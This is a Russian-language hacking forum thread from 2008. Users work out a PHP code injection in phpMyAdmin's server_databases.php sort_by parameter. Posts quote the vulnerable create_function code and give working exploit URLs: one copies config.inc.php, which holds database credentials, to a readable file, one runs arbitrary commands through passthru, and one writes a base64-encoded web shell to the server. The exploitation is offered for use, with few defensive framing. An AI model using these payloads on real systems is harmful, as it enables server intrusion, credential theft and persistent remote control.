Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
27.09.2008, 16:53
|
|
Участник форума
Регистрация: 23.05.2008
Сообщений: 121
Провел на форуме:
305110
Репутация:
133
|
|
Хм... скорее всего ид привязонно к ип !и подделов ид не получишь доступа! Есче вопросик а зачем ты заморачиваешься если у тебя есть доступ к базе ?
|
|
|
28.09.2008, 14:23
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Вопрос такой:
Последняя бага в phpMyAdmin (_http://www.securitylab.ru/vulnerability/359583.php):
1) Исходник бажного кода:
Код:
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));
Сам сплоит:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec ('cp $(pwd)"/config.inc.php" config.txt');//&sort_order=desc&token=825fdd1c5f1c43a450de3af6f6d 34b22
Бага в принципе понятна - отсуствие фильтрации при использовании переменных в создаваемой функции.
Тем не менне, эта бага нигде не работает. У меня.
Да и еще exec - я понимаю, php, но при чём тут тогда оператор OR?
P.S. magic_quotes=Off
token валидный
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 28.09.2008 в 15:33..
|
|
|
|
28.09.2008, 14:44
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
PHP код:
<?
$sort_by='"]) || exec(\'cp $(pwd)"/config.inc.php" config.txt\'); //';
$sort_order='desc';
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
echo $sort_function;
create_function('$a, $b', $sort_function)
?>
мы просто тактично делаем пхп инжект
вот что мы получим в $sort_function
return -1 * ($a[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"], $b[""]) || exec('cp $(pwd)"/config.inc.php" config.txt'); //"]);
я изменил or на ||
это просто логическое условие, что заставляет выполнятся наш код... |
|
|
|
28.09.2008, 14:53
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Так, то что || и OR эквивалентны буду знать. Под рутом, с правами на запись и при exec разрешенном все-равно не работает(
UPDATE.
Приведенный мной код сорцов - это 2.11.4, автор уязвимости утверждает, что
The problem also occurs in phpMyAdmin-2.x but it is not as easy to exploit as in 3.0
I will publish more informations some days after the patch is released
так что эксплоит для второй ветки, видимо, выглядит несколько иначе, чем приведённый выше.... Кто-нить может помочь с этим?
P.S. http://www.the-wildcat.de/phpmyadmin-code-execution-vulnerability/ - вот тут все нюансы.
UPDATE
для второй ветки написано MySQL < 5 и Option NaturalOrder должна быть установлена. Что это за оция?
Коммент от товарища desTiny
видимо, нюансы возникли из-за коммента - /**
* apply limit and order manually now
* (caused by older MySQL < 5 or $GLOBALS['cfg']['NaturalOrder'])
*/
вот - /**
* if $GLOBALS['cfg']['NaturalOrder'] is enabled, we cannot use LIMIT
* cause MySQL does not support natural ordering, we have to do it afterward
*/
Интересен также код:
PHP код:
if ($GLOBALS['cfg']['NaturalOrder']) {
$limit = '';
} else {
if ($limit_count) {
$limit = ' LIMIT ' . $limit_count . ' OFFSET ' . $limit_offset;
}
$apply_limit_and_order_manual = false;
}
DesTiny (15:57:36 28/09/2008)
если оно установлено ИЛИ версия мускуля <=4 то сортировка происходит вручную
DesTiny (15:57:47 28/09/2008)
посредством создаваемой функции
me (15:58:03 28/09/2008)
то есть для исользования баги
me (15:58:16 28/09/2008)
сортировка должна осуществляться вручную
DesTiny (15:58:20 28/09/2008)
да
me (15:58:22 28/09/2008)
следовательно -
me (15:58:31 28/09/2008)
$GLOBALS['cfg']['NaturalOrder'] - должна быть установлена
me (15:58:33 28/09/2008)
или
me (15:58:38 28/09/2008)
MySQL < 5
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 28.09.2008 в 16:03..
|
|
|
|
28.09.2008, 16:16
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269
Репутация:
1158
|
|
Скажите пожалуйста вывод:
Warning: Smarty error: a_eshop_show_info: missing 'item' parameter in /home/hosting/******/_engine/lib/smarty/Smarty.class.php on line 1042
Это скуль? Что то уже 2ой день над ней парюсь и без результатно. Может эта какая либо ошибка в скрипте?
|
|
|
|
28.09.2008, 16:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 04.02.2007
Сообщений: 1,152
Провел на форуме:
3008839
Репутация:
1502
|
|
2 1ten0.0net1:
Посмотрев на исходник - вижу структуру:
PHP код:
$apply_limit_and_order_manual = true;
if (PMA_MYSQL_INT_VERSION >= 50002) {
...
if ($GLOBALS['cfg']['NaturalOrder']) {
...
} else {
...
$apply_limit_and_order_manual = false;
}
}else{
...
}
if ($apply_limit_and_order_manual) {
if ($GLOBALS['cfg']['NaturalOrder']) {
$sorter = 'strnatcasecmp';
} else {
$sorter = 'strcasecmp';
}
// produces f.e.:
// return -1 * strnatcasecmp($a["SCHEMA_TABLES"], $b["SCHEMA_TABLES"])
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));
}
Если реально есть php-инжект, то MySQL<5 или $GLOBALS['cfg']['NaturalOrder'].
Тогда надо извращаться с
PHP код:
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
Не имея всего скрипта, проверять не могу - но предполагаю, что надо что-то типа
PHP код:
$sort_by = SCHEMA_TABLES"], $b["SCHEMA_TABLES"])*(eval("print 'xek';")==1?1:0);//
__________________
Bedankt euch dafür bei euch selbst.
H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ
|
|
|
|
28.09.2008, 16:19
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Сообщение от procedure
Скажите пожалуйста вывод:
Warning: Smarty error: a_eshop_show_info: missing 'item' parameter in /home/hosting/******/_engine/lib/smarty/Smarty.class.php on line 1042
Это скуль? Что то уже 2ой день над ней парюсь и без результатно. Может эта какая либо ошибка в скрипте?
Это не скуль, а ошибка в отсутствии переменной item обработчика шаблонов Smarty. Лучше ответьте на вопрос выше)
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 28.09.2008 в 16:25..
|
|
|
|
29.09.2008, 06:56
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
1ten0.0net1, у меня версия phpMyAdmin 2.11.4, и бага отлично работает - создает копию config.inc.php в корне директории с именем config.txt. Проверь права и владельца апача и директории
ЗЫ.
Код:
http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR passthru($_GET[ccmd]); //&sort_order=desc&token=[my_valid_token]&ccmd=ls
ЗЗЫ. Заливка простого шелла
Код:
http://127.0.0.1/pma/server_databases.php?pos=0&dbstats=0&sort_by="]) OR file_put_contents('config.php',base64_decode('PD8gcGFzc3RocnUoJF9HRVRbY2NtZF0pOyA/Pg==')); //&sort_order=desc&token=[my_valid_token]
Последний раз редактировалось krypt3r; 29.09.2008 в 07:13..
|
|
|
|
29.09.2008, 18:28
|
|
Banned
Регистрация: 22.12.2007
Сообщений: 660
Провел на форуме:
3885269
Репутация:
1158
|
|
Можно ли узнать что за админка по url. Если кому то знакома сылка, подскажите плиз.
admin.php?pd=&7900&md=control_access&inst=&
|
|
|
|
29.09.2008, 18:39
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от MaSTeR GэN
Хм... скорее всего ид привязонно к ип !и подделов ид не получишь доступа! Есче вопросик а зачем ты заморачиваешься если у тебя есть доступ к базе ?
Нет доступа к админке.
Последний раз редактировалось Велемир; 29.09.2008 в 18:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
